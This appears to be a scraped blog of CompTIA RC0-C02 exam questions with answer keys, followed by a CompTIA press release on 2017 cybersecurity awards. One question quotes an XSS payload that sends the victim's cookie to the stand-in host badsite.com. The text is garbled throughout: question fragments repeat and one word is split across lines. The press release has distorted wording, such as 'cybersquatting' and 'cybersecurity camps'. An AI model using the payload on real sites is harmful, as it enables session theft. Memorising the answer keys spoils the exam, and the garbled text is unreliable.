An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure?
A. Replicate NAS changes to the tape backups at the other datacenter.
B. Ensure each server has two HBAs connected through two routes to the NAS.
C. Establish deduplication across diverse storage paths.
D. Establish a SAN that replicates between datacenters.
Answer: D
Thursday, 6 December 2018
Sunday, 15 July 2018
CompTIA RC0-C02 Question Answer
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" +
request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
Answer: A
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
A. Software-based root of trust
B. Continuous chain of trust
C. Chain of trust with a hardware root of trust
D. Software-based trust anchor with no root of trust
Answer: C
<input name='credentials' type='TEXT' value='" +
request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
Answer: A
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
A. Software-based root of trust
B. Continuous chain of trust
C. Chain of trust with a hardware root of trust
D. Software-based trust anchor with no root of trust
Answer: C
Wednesday, 28 February 2018
CompTIA RC0-C02 Question Answer
A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?
A. Client side input validation
B. Stored procedure
C. Encrypting credit card details
D. Regular expression matching
Answer: D
A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?
A. Investigate the network traffic and block UDP port 3544 at the firewall
B. Remove the system from the network and disable IPv6 at the router
C. Locate and remove the unauthorized 6to4 relay from the network
D. Disable the switch port and block the 2001::/32 traffic at the firewall
Answer: A
A. Client side input validation
B. Stored procedure
C. Encrypting credit card details
D. Regular expression matching
Answer: D
A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?
A. Investigate the network traffic and block UDP port 3544 at the firewall
B. Remove the system from the network and disable IPv6 at the router
C. Locate and remove the unauthorized 6to4 relay from the network
D. Disable the switch port and block the 2001::/32 traffic at the firewall
Answer: A
Thursday, 28 December 2017
CompTIA RC0-C02 Question Answer
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the dat
a. Which of the following issues may potentially occur?
A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.
Answer: B
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation
Answer: E
a. Which of the following issues may potentially occur?
A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.
Answer: B
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation
Answer: E
Tuesday, 5 September 2017
CompTIA RC0-C02 Question Answer
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web. based shopping cart.
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking
Answer: C
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking
Answer: C
Sunday, 18 June 2017
CompTIA Presents 2017 Excellence in Cybersecurity Awards As New Survey Finds 83% of IT Professionals Spending More Time on Cyber Than Just Two Years Ago
CompTIA Excellence in Cybersecurity CompTIA today announced its 2017 CompTIA Excellence in Cybersecurity Awards to Rep. Jim Langevin (D-RI), Sen. Mike Rounds (R-SD) and Lisa Dorr, Director of Planning and Strength IT Work, Office of the Chief Information Officer, Department of Health and Human Services (HHS).
The CompTIA Awards for Excellence in Cyber Security recognize members of Congress and program managers of federal agencies who are making significant advances in the use of the federal resources wisely to improve the cyber security skills of those who work for Government of the United States.
The awards come at a time when cybersecurity occupies far more resources than ever before, according to a new survey of information technology (IT) professionals in the United States. More than 80 percent of IT professionals say cybersecurity is consuming more of their time than just one or two years ago; And 87 percent predict that the cyber threat landscape will only worsen.
"With our nation's workforce facing a serious cybersecurity skill deficit, our three winners are committed to ensuring that federal IT workers can meet the demands of the rapidly changing cyber-threat landscape," said Todd Thibodeaux, President and CEO. CEO of CompTIA. With these sensitive data at risk, these honorees are leading the burden to ensure that government workers have the skills and resources to protect federal systems now and in the future. "
IT professionals surveyed by CompTIA do not see a single silver bullet to allow the government to close the cyber-skills gap in the federal workforce. The best and most effective cybersecurity federal workforce will require a multifaceted approach, combining formal education, on-the-job training and change to workplace culture and compensation incentives.
The survey also reveals that
Seventy-six percent of IT professionals believe that the government should offer more competitive wages and flexible work arrangements for its technology workers
72 percent said the government should do a better job of identifying and promoting career paths for civilians and military of government cyber professionals
61 percent said the government should improve or expand cybersquatting to offset education costs in exchange for government services
59 percent said that government employers should be better educated and accept cyber professionals without 4-year university degrees.
About Excellence in Cyber Security
Representative Jim Langevin (D-RI)
Representative Langevin has been one of the House's key voices in cybersecurity issues through his leadership on the House Armed Services Committee's Emerging Threat Subcommittee and the Subcommittee on Cybersecurity, Infrastructure Protection and Security. Rep. Langevin has promoted a competition introducing high school students to the rapidly growing field of cybersecurity and obtained funding to begin other workforce development initiatives. These proposals are crucial to ensuring that we fill the next generation of the cybernetic workforce.
Sen. Mike Rounds (R-SD)
As chair of the Senate Cyber Security Subcommittee, Sen. Rounds has been instrumental in overseeing Department of Defense programs related to cybernetic forces and capabilities. Sen. Rounds also sponsored the DOD Cyber Scholarship Program Act, which seeks to modify and enhance an existing DOD scholarship program for students pursuing degrees in cybersecurity camps. Such a move would represent an important step towards supporting the country's continued need for a strong cybernetic workforce.
Lisa Dorr, Director of Planning and Development of the IT Task Force and Assistant Director of Personnel, Office of Information Security (OIS), United States Department of Health and Human Services
Lisa Dorr's work at the Department of Health and Human Services implementing the Federal Cyber Security Workforce Assessment Act has been a critical step in securing the personal information of millions of Americans. Through her leadership, Lisa has spearheaded HHS 'efforts to develop and implement vital cyber security policies and processes, execute intelligent workforce development strategies, and implement much-needed security training and awareness that will ultimately lead to increased protections Through the most delicate networks of the department.
Wednesday, 3 May 2017
CompTIA RC0-C02 Question Answer
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?
A. vTPM
B. HSM
C. TPM
D. INE
Answer: A
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?
A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk
Answer: A
A. vTPM
B. HSM
C. TPM
D. INE
Answer: A
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?
A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk
Answer: A
Subscribe to:
Posts (Atom)